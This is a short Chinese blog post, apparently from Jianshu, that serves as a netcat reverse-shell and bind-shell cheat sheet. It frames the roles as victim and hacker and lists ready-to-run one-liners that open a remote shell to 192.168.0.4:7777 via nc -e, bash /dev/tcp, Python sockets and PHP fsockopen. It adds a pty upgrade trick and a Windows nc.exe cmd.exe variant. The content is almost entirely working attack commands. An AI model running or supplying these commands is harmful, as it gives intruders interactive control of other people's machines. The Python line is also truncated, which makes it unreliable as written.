NC工具使用

1. 正向反弹shell

受害机监听7777:

nc -lvp 7777 -e /bin/bash

黑客正向连接

nc ip 7777

2. 反向反弹shell

黑客监听7777:

nc -lvp 7777

受害机反向连接

# 基于bash反弹
bash -i >& /dev/tcp/ip/port 0>&1
# 基于python反弹
python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('192.168.0.4',7777));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);
// 基于nc反弹
nc -e /bin/bash 192.168.0.4 7777
// 基于php反弹  注: 需要php关闭safe_mode这个选项
php- 'exec("/bin/bash -i >& /dev/tcp/192.168.0.4/7777")'
或
php -r '$sock=fsockopen("192.168.0.4",7777);exec("/bin/bash -i 0>&3 1>&3 2>&3");'

遇到反弹后不是正常的shell,可用命令:
python -c 'import pty;pty.spawn("/bin/bash")'
转化为常规的shell。

附: nc反弹cmdnc.exe 192.168.20.44 1234 -e c:\windows\system32\cmd.exe

©著作权归作者所有,转载或内容合作请联系作者
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

推荐阅读更多精彩内容